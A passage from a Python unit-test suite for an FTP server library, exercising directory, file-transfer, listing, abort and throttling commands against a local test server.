self.assertRaisesRegex(ftplib.error_perm, '530 Log in with USER',
self.client.sendcmd, 'stat /')
self.client.sendcmd('quit')
class TestFtpFsOperations(unittest.TestCase):
"test: PWD, CWD, CDUP, SIZE, RNFR, RNTO, DELE, MKD, RMD, MDTM, STAT"
server_class = FTPd
client_class = ftplib.FTP
def setUp(self):
self.server = self.server_class()
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
self.tempfile = os.path.basename(touch(TESTFN))
self.tempdir = os.path.basename(tempfile.mkdtemp(dir=HOME))
def tearDown(self):
self.client.close()
self.server.stop()
safe_remove(self.tempfile)
if os.path.exists(self.tempdir):
shutil.rmtree(self.tempdir)
def test_cwd(self):
self.client.cwd(self.tempdir)
self.assertEqual(self.client.pwd(), '/' + self.tempdir)
self.assertRaises(ftplib.error_perm, self.client.cwd, 'subtempdir')
# cwd provided with no arguments is supposed to move us to the
# root directory
self.client.sendcmd('cwd')
self.assertEqual(self.client.pwd(), u('/'))
def test_pwd(self):
self.assertEqual(self.client.pwd(), u('/'))
self.client.cwd(self.tempdir)
self.assertEqual(self.client.pwd(), '/' + self.tempdir)
def test_cdup(self):
subfolder = os.path.basename(tempfile.mkdtemp(dir=self.tempdir))
self.assertEqual(self.client.pwd(), u('/'))
self.client.cwd(self.tempdir)
self.assertEqual(self.client.pwd(), '/%s' % self.tempdir)
self.client.cwd(subfolder)
self.assertEqual(self.client.pwd(),
'/%s/%s' % (self.tempdir, subfolder))
self.client.sendcmd('cdup')
self.assertEqual(self.client.pwd(), '/%s' % self.tempdir)
self.client.sendcmd('cdup')
self.assertEqual(self.client.pwd(), u('/'))
# make sure we can't escape from root directory
self.client.sendcmd('cdup')
self.assertEqual(self.client.pwd(), u('/'))
def test_mkd(self):
tempdir = os.path.basename(tempfile.mktemp(dir=HOME))
dirname = self.client.mkd(tempdir)
# the 257 response is supposed to include the absolute dirname
self.assertEqual(dirname, '/' + tempdir)
# make sure we can't create directories which already exist
# (probably not really necessary);
# let's use a try/except statement to avoid leaving behind
# orphaned temporary directory in the event of a test failure.
try:
self.client.mkd(tempdir)
except ftplib.error_perm:
os.rmdir(tempdir) # ok
else:
self.fail('ftplib.error_perm not raised.')
def test_rmd(self):
self.client.rmd(self.tempdir)
self.assertRaises(ftplib.error_perm, self.client.rmd, self.tempfile)
# make sure we can't remove the root directory
self.assertRaisesRegex(ftplib.error_perm,
"Can't remove root directory",
self.client.rmd, u('/'))
def test_dele(self):
self.client.delete(self.tempfile)
self.assertRaises(ftplib.error_perm, self.client.delete, self.tempdir)
def test_rnfr_rnto(self):
# rename file
tempname = os.path.basename(tempfile.mktemp(dir=HOME))
self.client.rename(self.tempfile, tempname)
self.client.rename(tempname, self.tempfile)
# rename dir
tempname = os.path.basename(tempfile.mktemp(dir=HOME))
self.client.rename(self.tempdir, tempname)
self.client.rename(tempname, self.tempdir)
# rnfr/rnto over non-existing paths
bogus = os.path.basename(tempfile.mktemp(dir=HOME))
self.assertRaises(ftplib.error_perm, self.client.rename, bogus, '/x')
self.assertRaises(
ftplib.error_perm, self.client.rename, self.tempfile, u('/'))
# rnto sent without first specifying the source
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'rnto ' + self.tempfile)
# make sure we can't rename root directory
self.assertRaisesRegex(ftplib.error_perm,
"Can't rename home directory",
self.client.rename, '/', '/x')
def test_mdtm(self):
self.client.sendcmd('mdtm ' + self.tempfile)
bogus = os.path.basename(tempfile.mktemp(dir=HOME))
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'mdtm ' + bogus)
# make sure we can't use mdtm against directories
try:
self.client.sendcmd('mdtm ' + self.tempdir)
except ftplib.error_perm as err:
self.assertTrue("not retrievable" in str(err))
else:
self.fail('Exception not raised')
def test_unforeseen_mdtm_event(self):
# Emulate a case where the file last modification time is prior
# to year 1900. This most likely will never happen unless
# someone specifically force the last modification time of a
# file in some way.
# To do so we temporarily override os.path.getmtime so that it
# returns a negative value referring to a year prior to 1900.
# It causes time.localtime/gmtime to raise a ValueError exception
# which is supposed to be handled by server.
# On python 3 it seems that the trick of replacing the original
# method with the lambda doesn't work.
if not PY3:
_getmtime = AbstractedFS.getmtime
try:
AbstractedFS.getmtime = lambda x, y: -9000000000
self.assertRaisesRegex(
ftplib.error_perm,
"550 Can't determine file's last modification time",
self.client.sendcmd, 'mdtm ' + self.tempfile)
# make sure client hasn't been disconnected
self.client.sendcmd('noop')
finally:
AbstractedFS.getmtime = _getmtime
def test_size(self):
self.client.sendcmd('type a')
self.assertRaises(ftplib.error_perm, self.client.size, self.tempfile)
self.client.sendcmd('type i')
self.client.size(self.tempfile)
# make sure we can't use size against directories
try:
self.client.sendcmd('size ' + self.tempdir)
except ftplib.error_perm as err:
self.assertTrue("not retrievable" in str(err))
else:
self.fail('Exception not raised')
if not hasattr(os, 'chmod'):
def test_site_chmod(self):
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'site chmod 777 ' + self.tempfile)
else:
def test_site_chmod(self):
# not enough args
self.assertRaises(ftplib.error_perm,
self.client.sendcmd, 'site chmod 777')
# bad args
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'site chmod -177 ' + self.tempfile)
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'site chmod 778 ' + self.tempfile)
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'site chmod foo ' + self.tempfile)
def getmode():
mode = oct(stat.S_IMODE(os.stat(self.tempfile).st_mode))
if PY3:
mode = mode.replace('o', '')
return mode
# on Windows it is possible to set read-only flag only
if WINDOWS:
self.client.sendcmd('site chmod 777 ' + self.tempfile)
self.assertEqual(getmode(), '0666')
self.client.sendcmd('site chmod 444 ' + self.tempfile)
self.assertEqual(getmode(), '0444')
self.client.sendcmd('site chmod 666 ' + self.tempfile)
self.assertEqual(getmode(), '0666')
else:
self.client.sendcmd('site chmod 777 ' + self.tempfile)
self.assertEqual(getmode(), '0777')
self.client.sendcmd('site chmod 755 ' + self.tempfile)
self.assertEqual(getmode(), '0755')
self.client.sendcmd('site chmod 555 ' + self.tempfile)
self.assertEqual(getmode(), '0555')
class TestFtpStoreData(unittest.TestCase):
"""Test STOR, STOU, APPE, REST, TYPE."""
server_class = FTPd
client_class = ftplib.FTP
def setUp(self):
self.server = self.server_class()
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
self.dummy_recvfile = BytesIO()
self.dummy_sendfile = BytesIO()
def tearDown(self):
self.client.close()
self.server.stop()
self.dummy_recvfile.close()
self.dummy_sendfile.close()
safe_remove(TESTFN)
def test_stor(self):
try:
data = b'abcde12345' * 100000
self.dummy_sendfile.write(data)
self.dummy_sendfile.seek(0)
self.client.storbinary('stor ' + TESTFN, self.dummy_sendfile)
self.client.retrbinary('retr ' + TESTFN, self.dummy_recvfile.write)
self.dummy_recvfile.seek(0)
datafile = self.dummy_recvfile.read()
self.assertEqual(len(data), len(datafile))
self.assertEqual(hash(data), hash(datafile))
finally:
# We do not use os.remove() because file could still be
# locked by ftpd thread. If DELE through FTP fails try
# os.remove() as last resort.
if os.path.exists(TESTFN):
try:
self.client.delete(TESTFN)
except (ftplib.Error, EOFError, socket.error):
safe_remove(TESTFN)
def test_stor_active(self):
# Like test_stor but using PORT
self.client.set_pasv(False)
self.test_stor()
def test_stor_ascii(self):
# Test STOR in ASCII mode
def store(cmd, fp, blocksize=8192):
# like storbinary() except it sends "type a" instead of
# "type i" before starting the transfer
self.client.voidcmd('type a')
with contextlib.closing(self.client.transfercmd(cmd)) as conn:
while 1:
buf = fp.read(blocksize)
if not buf:
break
conn.sendall(buf)
return self.client.voidresp()
try:
data = b'abcde12345\r\n' * 100000
self.dummy_sendfile.write(data)
self.dummy_sendfile.seek(0)
store('stor ' + TESTFN, self.dummy_sendfile)
self.client.retrbinary('retr ' + TESTFN, self.dummy_recvfile.write)
expected = data.replace(b'\r\n', b(os.linesep))
self.dummy_recvfile.seek(0)
datafile = self.dummy_recvfile.read()
self.assertEqual(len(expected), len(datafile))
self.assertEqual(hash(expected), hash(datafile))
finally:
# We do not use os.remove() because file could still be
# locked by ftpd thread. If DELE through FTP fails try
# os.remove() as last resort.
if os.path.exists(TESTFN):
try:
self.client.delete(TESTFN)
except (ftplib.Error, EOFError, socket.error):
safe_remove(TESTFN)
def test_stor_ascii_2(self):
# Test that no extra extra carriage returns are added to the
# file in ASCII mode in case CRLF gets truncated in two chunks
# (issue 116)
def store(cmd, fp, blocksize=8192):
# like storbinary() except it sends "type a" instead of
# "type i" before starting the transfer
self.client.voidcmd('type a')
with contextlib.closing(self.client.transfercmd(cmd)) as conn:
while 1:
buf = fp.read(blocksize)
if not buf:
break
conn.sendall(buf)
return self.client.voidresp()
old_buffer = DTPHandler.ac_in_buffer_size
try:
# set a small buffer so that CRLF gets delivered in two
# separate chunks: "CRLF", " f", "oo", " CR", "LF", " b", "ar"
DTPHandler.ac_in_buffer_size = 2
data = b'\r\n foo \r\n bar'
self.dummy_sendfile.write(data)
self.dummy_sendfile.seek(0)
store('stor ' + TESTFN, self.dummy_sendfile)
expected = data.replace(b'\r\n', b(os.linesep))
self.client.retrbinary('retr ' + TESTFN, self.dummy_recvfile.write)
self.dummy_recvfile.seek(0)
self.assertEqual(expected, self.dummy_recvfile.read())
finally:
DTPHandler.ac_in_buffer_size = old_buffer
# We do not use os.remove() because file could still be
# locked by ftpd thread. If DELE through FTP fails try
# os.remove() as last resort.
if os.path.exists(TESTFN):
try:
self.client.delete(TESTFN)
except (ftplib.Error, EOFError, socket.error):
safe_remove(TESTFN)
def test_stou(self):
data = b'abcde12345' * 100000
self.dummy_sendfile.write(data)
self.dummy_sendfile.seek(0)
self.client.voidcmd('TYPE I')
# filename comes in as "1xx FILE: <filename>"
filename = self.client.sendcmd('stou').split('FILE: ')[1]
try:
with contextlib.closing(self.client.makeport()) as sock:
conn, sockaddr = sock.accept()
with contextlib.closing(conn):
conn.settimeout(TIMEOUT)
if hasattr(self.client_class, 'ssl_version'):
conn = ssl.wrap_socket(conn)
while 1:
buf = self.dummy_sendfile.read(8192)
if not buf:
break
conn.sendall(buf)
# transfer finished, a 226 response is expected
self.assertEqual('226', self.client.voidresp()[:3])
self.client.retrbinary('retr ' + filename,
self.dummy_recvfile.write)
self.dummy_recvfile.seek(0)
datafile = self.dummy_recvfile.read()
self.assertEqual(len(data), len(datafile))
self.assertEqual(hash(data), hash(datafile))
finally:
# We do not use os.remove() because file could still be
# locked by ftpd thread. If DELE through FTP fails try
# os.remove() as last resort.
if os.path.exists(filename):
try:
self.client.delete(filename)
except (ftplib.Error, EOFError, socket.error):
safe_remove(filename)
def test_stou_rest(self):
# Watch for STOU preceded by REST, which makes no sense.
self.client.sendcmd('type i')
self.client.sendcmd('rest 10')
self.assertRaisesRegex(ftplib.error_temp, "Can't STOU while REST",
self.client.sendcmd, 'stou')
def test_stou_orphaned_file(self):
# Check that no orphaned file gets left behind when STOU fails.
# Even if STOU fails the file is first created and then erased.
# Since we can't know the name of the file the best way that
# we have to test this case is comparing the content of the
# directory before and after STOU has been issued.
# Assuming that TESTFN is supposed to be a "reserved" file
# name we shouldn't get false positives.
safe_remove(TESTFN)
# login as a limited user in order to make STOU fail
self.client.login('anonymous', '@nopasswd')
before = os.listdir(HOME)
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'stou ' + TESTFN)
after = os.listdir(HOME)
if before != after:
for file in after:
self.assertFalse(file.startswith(TESTFN))
def test_appe(self):
try:
data1 = b'abcde12345' * 100000
self.dummy_sendfile.write(data1)
self.dummy_sendfile.seek(0)
self.client.storbinary('stor ' + TESTFN, self.dummy_sendfile)
data2 = b'fghil67890' * 100000
self.dummy_sendfile.write(data2)
self.dummy_sendfile.seek(len(data1))
self.client.storbinary('appe ' + TESTFN, self.dummy_sendfile)
self.client.retrbinary("retr " + TESTFN, self.dummy_recvfile.write)
self.dummy_recvfile.seek(0)
datafile = self.dummy_recvfile.read()
self.assertEqual(len(data1 + data2), len(datafile))
self.assertEqual(hash(data1 + data2), hash(datafile))
finally:
# We do not use os.remove() because file could still be
# locked by ftpd thread. If DELE through FTP fails try
# os.remove() as last resort.
if os.path.exists(TESTFN):
try:
self.client.delete(TESTFN)
except (ftplib.Error, EOFError, socket.error):
safe_remove(TESTFN)
def test_appe_rest(self):
# Watch for APPE preceded by REST, which makes no sense.
self.client.sendcmd('type i')
self.client.sendcmd('rest 10')
self.assertRaisesRegex(ftplib.error_temp, "Can't APPE while REST",
self.client.sendcmd, 'appe x')
def test_rest_on_stor(self):
# Test STOR preceded by REST.
data = b'abcde12345' * 100000
self.dummy_sendfile.write(data)
self.dummy_sendfile.seek(0)
self.client.voidcmd('TYPE I')
with contextlib.closing(
self.client.transfercmd('stor ' + TESTFN)) as conn:
bytes_sent = 0
while 1:
chunk = self.dummy_sendfile.read(BUFSIZE)
conn.sendall(chunk)
bytes_sent += len(chunk)
# stop transfer while it isn't finished yet
if bytes_sent >= INTERRUPTED_TRANSF_SIZE or not chunk:
break
# transfer wasn't finished yet but server can't know this,
# hence expect a 226 response
self.assertEqual('226', self.client.voidresp()[:3])
# resuming transfer by using a marker value greater than the
# file size stored on the server should result in an error
# on stor
file_size = self.client.size(TESTFN)
self.assertEqual(file_size, bytes_sent)
self.client.sendcmd('rest %s' % ((file_size + 1)))
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'stor ' + TESTFN)
self.client.sendcmd('rest %s' % bytes_sent)
self.client.storbinary('stor ' + TESTFN, self.dummy_sendfile)
self.client.retrbinary('retr ' + TESTFN, self.dummy_recvfile.write)
self.dummy_sendfile.seek(0)
self.dummy_recvfile.seek(0)
data_sendfile = self.dummy_sendfile.read()
data_recvfile = self.dummy_recvfile.read()
self.assertEqual(len(data_sendfile), len(data_recvfile))
self.assertEqual(len(data_sendfile), len(data_recvfile))
self.client.delete(TESTFN)
def test_failing_rest_on_stor(self):
# Test REST -> STOR against a non existing file.
if os.path.exists(TESTFN):
self.client.delete(TESTFN)
self.client.sendcmd('type i')
self.client.sendcmd('rest 10')
self.assertRaises(ftplib.error_perm, self.client.storbinary,
'stor ' + TESTFN, lambda x: x)
# if the first STOR failed because of REST, the REST marker
# is supposed to be resetted to 0
self.dummy_sendfile.write(b'x' * 4096)
self.dummy_sendfile.seek(0)
self.client.storbinary('stor ' + TESTFN, self.dummy_sendfile)
def test_quit_during_transfer(self):
# RFC-959 states that if QUIT is sent while a transfer is in
# progress, the connection must remain open for result response
# and the server will then close it.
with contextlib.closing(
self.client.transfercmd('stor ' + TESTFN)) as conn:
conn.sendall(b'abcde12345' * 50000)
self.client.sendcmd('quit')
conn.sendall(b'abcde12345' * 50000)
# expect the response (transfer ok)
self.assertEqual('226', self.client.voidresp()[:3])
# Make sure client has been disconnected.
# socket.error (Windows) or EOFError (Linux) exception is supposed
# to be raised in such a case.
self.client.sock.settimeout(.1)
self.assertRaises((socket.error, EOFError),
self.client.sendcmd, 'noop')
def test_stor_empty_file(self):
self.client.storbinary('stor ' + TESTFN, self.dummy_sendfile)
self.client.quit()
with open(TESTFN) as f:
self.assertEqual(f.read(), "")
@unittest.skipUnless(POSIX, "POSIX only")
@unittest.skipIf(sys.version_info < (3, 3) and sendfile is None,
"pysendfile not installed")
class TestFtpStoreDataNoSendfile(TestFtpStoreData):
"""Test STOR, STOU, APPE, REST, TYPE not using sendfile()."""
def setUp(self):
TestFtpStoreData.setUp(self)
self.server.handler.use_sendfile = False
def tearDown(self):
TestFtpStoreData.tearDown(self)
self.server.handler.use_sendfile = True
@unittest.skipUnless(POSIX, "POSIX only")
@unittest.skipIf(sys.version_info < (3, 3) and sendfile is None,
"pysendfile not installed")
class TestSendfile(unittest.TestCase):
"""Sendfile specific tests."""
server_class = FTPd
client_class = ftplib.FTP
def setUp(self):
self.server = self.server_class()
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
self.dummy_recvfile = BytesIO()
self.dummy_sendfile = BytesIO()
def tearDown(self):
self.client.close()
self.server.stop()
self.dummy_recvfile.close()
self.dummy_sendfile.close()
safe_remove(TESTFN)
def test_fallback(self):
# Makes sure that if sendfile() fails and no bytes were
# transmitted yet the server falls back on using plain
# send()
data = b'abcde12345' * 100000
self.dummy_sendfile.write(data)
self.dummy_sendfile.seek(0)
self.client.storbinary('stor ' + TESTFN, self.dummy_sendfile)
with mock.patch('pyftpdlib.handlers.sendfile',
side_effect=OSError(errno.EINVAL)) as fun:
try:
self.client.retrbinary(
'retr ' + TESTFN, self.dummy_recvfile.write)
assert fun.called
self.dummy_recvfile.seek(0)
datafile = self.dummy_recvfile.read()
self.assertEqual(len(data), len(datafile))
self.assertEqual(hash(data), hash(datafile))
finally:
# We do not use os.remove() because file could still be
# locked by ftpd thread. If DELE through FTP fails try
# os.remove() as last resort.
if os.path.exists(TESTFN):
try:
self.client.delete(TESTFN)
except (ftplib.Error, EOFError, socket.error):
safe_remove(TESTFN)
class TestFtpRetrieveData(unittest.TestCase):
"Test RETR, REST, TYPE"
server_class = FTPd
client_class = ftplib.FTP
def setUp(self):
self.server = self.server_class()
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
self.file = open(TESTFN, 'w+b')
self.dummyfile = BytesIO()
def tearDown(self):
self.client.close()
self.server.stop()
if not self.file.closed:
self.file.close()
if not self.dummyfile.closed:
self.dummyfile.close()
safe_remove(TESTFN)
def test_retr(self):
data = b'abcde12345' * 100000
self.file.write(data)
self.file.close()
self.client.retrbinary("retr " + TESTFN, self.dummyfile.write)
self.dummyfile.seek(0)
datafile = self.dummyfile.read()
self.assertEqual(len(data), len(datafile))
self.assertEqual(hash(data), hash(datafile))
# attempt to retrieve a file which doesn't exist
bogus = os.path.basename(tempfile.mktemp(dir=HOME))
self.assertRaises(ftplib.error_perm, self.client.retrbinary,
"retr " + bogus, lambda x: x)
def test_retr_ascii(self):
# Test RETR in ASCII mode.
def retrieve(cmd, callback, blocksize=8192, rest=None):
# like retrbinary but uses TYPE A instead
self.client.voidcmd('type a')
with contextlib.closing(
self.client.transfercmd(cmd, rest)) as conn:
conn.settimeout(TIMEOUT)
while 1:
data = conn.recv(blocksize)
if not data:
break
callback(data)
return self.client.voidresp()
data = (b'abcde12345' + b(os.linesep)) * 100000
self.file.write(data)
self.file.close()
retrieve("retr " + TESTFN, self.dummyfile.write)
expected = data.replace(b(os.linesep), b'\r\n')
self.dummyfile.seek(0)
datafile = self.dummyfile.read()
self.assertEqual(len(expected), len(datafile))
self.assertEqual(hash(expected), hash(datafile))
@retry_before_failing()
def test_restore_on_retr(self):
data = b'abcde12345' * 1000000
self.file.write(data)
self.file.close()
received_bytes = 0
self.client.voidcmd('TYPE I')
with contextlib.closing(
self.client.transfercmd('retr ' + TESTFN)) as conn:
while 1:
chunk = conn.recv(BUFSIZE)
if not chunk:
break
self.dummyfile.write(chunk)
received_bytes += len(chunk)
if received_bytes >= INTERRUPTED_TRANSF_SIZE:
break
# transfer wasn't finished yet so we expect a 426 response
self.assertEqual(self.client.getline()[:3], "426")
# resuming transfer by using a marker value greater than the
# file size stored on the server should result in an error
# on retr (RFC-1123)
file_size = self.client.size(TESTFN)
self.client.sendcmd('rest %s' % ((file_size + 1)))
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'retr ' + TESTFN)
# test resume
self.client.sendcmd('rest %s' % received_bytes)
self.client.retrbinary("retr " + TESTFN, self.dummyfile.write)
self.dummyfile.seek(0)
datafile = self.dummyfile.read()
self.assertEqual(len(data), len(datafile))
self.assertEqual(hash(data), hash(datafile))
def test_retr_empty_file(self):
self.client.retrbinary("retr " + TESTFN, self.dummyfile.write)
self.dummyfile.seek(0)
self.assertEqual(self.dummyfile.read(), b"")
@unittest.skipUnless(POSIX, "POSIX only")
@unittest.skipIf(sys.version_info < (3, 3) and sendfile is None,
"pysendfile not installed")
class TestFtpRetrieveDataNoSendfile(TestFtpRetrieveData):
"""Test RETR, REST, TYPE by not using sendfile()."""
def setUp(self):
TestFtpRetrieveData.setUp(self)
self.server.handler.use_sendfile = False
def tearDown(self):
TestFtpRetrieveData.tearDown(self)
self.server.handler.use_sendfile = True
class TestFtpListingCmds(unittest.TestCase):
"""Test LIST, NLST, argumented STAT."""
server_class = FTPd
client_class = ftplib.FTP
def setUp(self):
self.server = self.server_class()
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
touch(TESTFN)
def tearDown(self):
self.client.close()
self.server.stop()
os.remove(TESTFN)
def _test_listing_cmds(self, cmd):
"""Tests common to LIST NLST and MLSD commands."""
# assume that no argument has the same meaning of "/"
l1 = l2 = []
self.client.retrlines(cmd, l1.append)
self.client.retrlines(cmd + ' /', l2.append)
self.assertEqual(l1, l2)
if cmd.lower() != 'mlsd':
# if pathname is a file one line is expected
x = []
self.client.retrlines('%s ' % cmd + TESTFN, x.append)
self.assertEqual(len(x), 1)
self.assertTrue(''.join(x).endswith(TESTFN))
# non-existent path, 550 response is expected
bogus = os.path.basename(tempfile.mktemp(dir=HOME))
self.assertRaises(ftplib.error_perm, self.client.retrlines,
'%s ' % cmd + bogus, lambda x: x)
# for an empty directory we excpect that the data channel is
# opened anyway and that no data is received
x = []
tempdir = os.path.basename(tempfile.mkdtemp(dir=HOME))
try:
self.client.retrlines('%s %s' % (cmd, tempdir), x.append)
self.assertEqual(x, [])
finally:
safe_rmdir(tempdir)
def test_nlst(self):
# common tests
self._test_listing_cmds('nlst')
def test_list(self):
# common tests
self._test_listing_cmds('list')
# known incorrect pathname arguments (e.g. old clients) are
# expected to be treated as if pathname would be == '/'
l1 = l2 = l3 = l4 = l5 = []
self.client.retrlines('list /', l1.append)
self.client.retrlines('list -a', l2.append)
self.client.retrlines('list -l', l3.append)
self.client.retrlines('list -al', l4.append)
self.client.retrlines('list -la', l5.append)
tot = (l1, l2, l3, l4, l5)
for x in range(len(tot) - 1):
self.assertEqual(tot[x], tot[x + 1])
def test_mlst(self):
# utility function for extracting the line of interest
def mlstline(cmd):
return self.client.voidcmd(cmd).split('\n')[1]
# the fact set must be preceded by a space
self.assertTrue(mlstline('mlst').startswith(' '))
# where TVFS is supported, a fully qualified pathname is expected
self.assertTrue(mlstline('mlst ' + TESTFN).endswith('/' + TESTFN))
self.assertTrue(mlstline('mlst').endswith('/'))
# assume that no argument has the same meaning of "/"
self.assertEqual(mlstline('mlst'), mlstline('mlst /'))
# non-existent path
bogus = os.path.basename(tempfile.mktemp(dir=HOME))
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'mlst ' + bogus)
# test file/dir notations
self.assertTrue('type=dir' in mlstline('mlst'))
self.assertTrue('type=file' in mlstline('mlst ' + TESTFN))
# let's add some tests for OPTS command
self.client.sendcmd('opts mlst type;')
self.assertEqual(mlstline('mlst'), ' type=dir; /')
# where no facts are present, two leading spaces before the
# pathname are required (RFC-3659)
self.client.sendcmd('opts mlst')
self.assertEqual(mlstline('mlst'), ' /')
def test_mlsd(self):
# common tests
self._test_listing_cmds('mlsd')
dir = os.path.basename(tempfile.mkdtemp(dir=HOME))
self.addCleanup(safe_rmdir, dir)
try:
self.client.retrlines('mlsd ' + TESTFN, lambda x: x)
except ftplib.error_perm as err:
resp = str(err)
# if path is a file a 501 response code is expected
self.assertEqual(str(resp)[0:3], "501")
else:
self.fail("Exception not raised")
def test_mlsd_all_facts(self):
feat = self.client.sendcmd('feat')
# all the facts
facts = re.search(r'^\s*MLST\s+(\S+)$', feat, re.MULTILINE).group(1)
facts = facts.replace("*;", ";")
self.client.sendcmd('opts mlst ' + facts)
resp = self.client.sendcmd('mlst')
local = facts[:-1].split(";")
returned = resp.split("\n")[1].strip()[:-3]
returned = [x.split("=")[0] for x in returned.split(";")]
self.assertEqual(sorted(local), sorted(returned))
self.assertTrue("type" in resp)
self.assertTrue("size" in resp)
self.assertTrue("perm" in resp)
self.assertTrue("modify" in resp)
if POSIX:
self.assertTrue("unique" in resp)
self.assertTrue("unix.mode" in resp)
self.assertTrue("unix.uid" in resp)
self.assertTrue("unix.gid" in resp)
elif WINDOWS:
self.assertTrue("create" in resp)
def test_stat(self):
# Test STAT provided with argument which is equal to LIST
self.client.sendcmd('stat /')
self.client.sendcmd('stat ' + TESTFN)
self.client.putcmd('stat *')
resp = self.client.getmultiline()
self.assertEqual(resp, '550 Globbing not supported.')
bogus = os.path.basename(tempfile.mktemp(dir=HOME))
self.assertRaises(ftplib.error_perm, self.client.sendcmd,
'stat ' + bogus)
def test_unforeseen_time_event(self):
# Emulate a case where the file last modification time is prior
# to year 1900. This most likely will never happen unless
# someone specifically force the last modification time of a
# file in some way.
# To do so we temporarily override os.path.getmtime so that it
# returns a negative value referring to a year prior to 1900.
# It causes time.localtime/gmtime to raise a ValueError exception
# which is supposed to be handled by server.
_getmtime = AbstractedFS.getmtime
try:
AbstractedFS.getmtime = lambda x, y: -9000000000
self.client.sendcmd('stat /') # test AbstractedFS.format_list()
self.client.sendcmd('mlst /') # test AbstractedFS.format_mlsx()
# make sure client hasn't been disconnected
self.client.sendcmd('noop')
finally:
AbstractedFS.getmtime = _getmtime
class TestFtpAbort(unittest.TestCase):
"test: ABOR"
server_class = FTPd
client_class = ftplib.FTP
def setUp(self):
self.server = self.server_class()
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
def tearDown(self):
self.client.close()
self.server.stop()
def test_abor_no_data(self):
# Case 1: ABOR while no data channel is opened: respond with 225.
resp = self.client.sendcmd('ABOR')
self.assertEqual('225 No transfer to abort.', resp)
self.client.retrlines('list', [].append)
def test_abor_pasv(self):
# Case 2: user sends a PASV, a data-channel socket is listening
# but not connected, and ABOR is sent: close listening data
# socket, respond with 225.
self.client.makepasv()
respcode = self.client.sendcmd('ABOR')[:3]
self.assertEqual('225', respcode)
self.client.retrlines('list', [].append)
def test_abor_port(self):
# Case 3: data channel opened with PASV or PORT, but ABOR sent
# before a data transfer has been started: close data channel,
# respond with 225
self.client.set_pasv(0)
with contextlib.closing(self.client.makeport()):
respcode = self.client.sendcmd('ABOR')[:3]
self.assertEqual('225', respcode)
self.client.retrlines('list', [].append)
def test_abor_during_transfer(self):
# Case 4: ABOR while a data transfer on DTP channel is in
# progress: close data channel, respond with 426, respond
# with 226.
data = b'abcde12345' * 1000000
with open(TESTFN, 'w+b') as f:
f.write(data)
try:
self.client.voidcmd('TYPE I')
with contextlib.closing(
self.client.transfercmd('retr ' + TESTFN)) as conn:
bytes_recv = 0
while bytes_recv < 65536:
chunk = conn.recv(BUFSIZE)
bytes_recv += len(chunk)
# stop transfer while it isn't finished yet
self.client.putcmd('ABOR')
# transfer isn't finished yet so ftpd should respond with 426
self.assertEqual(self.client.getline()[:3], "426")
# transfer successfully aborted, so should now respond
# with a 226
self.assertEqual('226', self.client.voidresp()[:3])
finally:
# We do not use os.remove() because file could still be
# locked by ftpd thread. If DELE through FTP fails try
# os.remove() as last resort.
try:
self.client.delete(TESTFN)
except (ftplib.Error, EOFError, socket.error):
safe_remove(TESTFN)
@unittest.skipUnless(hasattr(socket, 'MSG_OOB'), "MSG_OOB not available")
@unittest.skipIf(sys.version_info < (2, 6),
"does not work on python < 2.6")
@unittest.skipIf(OSX, "does not work on OSX")
def test_oob_abor(self):
# Send ABOR by following the RFC-959 directives of sending
# Telnet IP/Synch sequence as OOB data.
# On some systems like FreeBSD this happened to be a problem
# due to a different SO_OOBINLINE behavior.
# On some platforms (e.g. Python CE) the test may fail
# although the MSG_OOB constant is defined.
self.client.sock.sendall(b(chr(244)), socket.MSG_OOB)
self.client.sock.sendall(b(chr(255)), socket.MSG_OOB)
self.client.sock.sendall(b'abor\r\n')
self.assertEqual(self.client.getresp()[:3], '225')
class TestThrottleBandwidth(unittest.TestCase):
"""Test ThrottledDTPHandler class."""
server_class = FTPd
client_class = ftplib.FTP
def setUp(self):
class CustomDTPHandler(ThrottledDTPHandler):
# overridden so that the "awake" callback is executed
# immediately; this way we won't introduce any slowdown
# and still test the code of interest
def _throttle_bandwidth(self, *args, **kwargs):
ThrottledDTPHandler._throttle_bandwidth(self, *args, **kwargs)
if (self._throttler is not None and not
self._throttler.cancelled):
self._throttler.call()
self._throttler = None
self.server = self.server_class()
self.server.handler.dtp_handler = CustomDTPHandler
self.server.start()
self.client = self.client_class(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.client.login(USER, PASSWD)
self.dummyfile = BytesIO()
def tearDown(self):
self.client.close()
self.server.handler.dtp_handler.read_limit = 0
self.server.handler.dtp_handler.write_limit = 0
self.server.handler.dtp_handler = DTPHandler
self.server.stop()
if not self.dummyfile.closed:
self.dummyfile.close()
if os.path.exists(TESTFN):
os.remove(TESTFN)
def test_throttle_send(self):
# This test doesn't test the actual speed accuracy, just
# awakes all that code which implements the throttling.
self.server.handler.dtp_handler.write_limit = 32768
data = b'abcde12345' * 100000
with open(TESTFN, 'wb') as file:
file.write(data)
self.client.retrbinary("retr " + TESTFN, self.dummyfile.write)
self.dummyfile.seek(0)
datafile = self.dummyfile.read()
self.assertEqual(len(data), len(datafile))
self.assertEqual(hash(data), hash(datafile))
def test_throttle_recv(self):
# This test doesn't test the actual speed accuracy, just
# awakes all that code which implements the throttling.
self.server.handler.dtp_handler.read_limit = 32768
data = b'abcde12345' * 100000
self.dummyfile.write(data)
self.dummyfile.seek(0)
self.client.storbinary("stor " + TESTFN, self.dummyfile)
